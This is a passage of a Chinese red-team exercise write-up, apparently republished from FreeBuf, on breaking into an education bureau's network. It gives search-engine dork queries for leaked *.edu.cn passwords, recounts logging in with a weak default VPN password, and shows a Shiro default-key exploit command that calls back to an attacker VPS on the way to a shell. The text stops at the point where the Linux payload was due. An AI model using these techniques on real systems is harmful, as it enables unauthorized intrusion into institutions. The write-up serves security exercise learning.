攻防演练|记一次对xx教育局攻防总结
2023-7-28 10:11:59 Author: www.freebuf.com(查看原文) 阅读量:68 收藏

freeBuf

主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

前言

这次攻防演练每个队伍分配不同的目标,有些队伍拿的点可以直接 nday 打,有些队伍外网打点十分困难比如我们,但分数是是统一算的,可以说不是那么的公平。不过也算是提供了些许经验,简单做一下总结,都是比较基础的东西,如有写的不正确的地方欢迎各位师傅指正。

外网打点

敏感信息泄露

一般来说学校外网能拿直接权限的点已经很少了,web 应用大多是放在 vpn 后面,因此能弄到一个 vpn 账号可以说是事半功倍

另外还可以通过语法筛选出存在默认弱口令的系统,常用命令如下:

PLAINTEXT

1
2
3
4
5
6
7
#google语法
site:*.edu.cn intext: vpn | 用户名 | 密码 | 帐号 | 默认密码

#github
*.edu.cn password

查看方式优先选择最近更新,太久远的基本上失效了

1690509796_64c321e40f742b78f0502.png!small?1690509797531

1690509803_64c321eb4f59fb516e68a.png!small?1690509804436

这里队友收集到了某个目标的 vpn 账号,使用的是 姓名拼音/12345678 弱口令

1690509810_64c321f2658dc7a3c1ae6.png!small?1690509811660

进去内网后能访问的只有一个 OA 系统,测试了一下没发现什么东西,寻找其他突破口

shiro 无链

常规的打点可通过 fofa、hunter、quake 等网络测绘平台进行资产收集,收集好后进行去重,把去重后的资产列表进行批量指纹识别,筛选出重要易打点的系统

在常规的 hw 中这些方法比较通用,但是对于教育行业来说会相对困难,有 edusrc 的存在许多通用型漏洞已经被提交修复了,因此在信息搜集的时候要多去寻找旁站和一些容易被遗漏的站点

坐了一天牢后,终于通过测绘平台找到一个比较偏的资产,直接访问是一个静态页面,但扫描目录后指纹识别一波发现是 shiro

直接工具开冲,发现有默认 key 但是无利用链

1690509820_64c321fc815b906ab7cd1.png!small?1690509821837

这里想到之前学习 shiro 可以无依赖利用,感觉有戏尝试一波,相关知识可学习此文章 https://www.le1a.com/posts/a5f4a9e3/

PLAINTEXT

1
2
java -jar shiro_tool.jar 地址
VPS:端口

1690509834_64c3220a501cee900a649.png!small?1690509835521

通过 dnslog 测试有回显,这里有个注意点:使用 http://dnslog.cn/部分站点会拦截,可以换多个 dnslog 平台测试

1690509843_64c32213c4172c16cab35.png!small?1690509844737

dnslog 有回显接下来就是拿 shell 了,这里由于固化思维,之前遇到的都是 linux 系统,先入为主觉得是 Linux,结果没利用成功

这里可以通过网站快速生成 payload,https://x.hacking8.com/java-runtime.html

一开始以为是防火墙拦截,后面队友探测了一下目录结构,发现是 windows,所以这里 payload 要改变一下

Linux:


文章来源: https://www.freebuf.com/articles/web/373268.html
如有侵权请联系:admin#unsafe.sh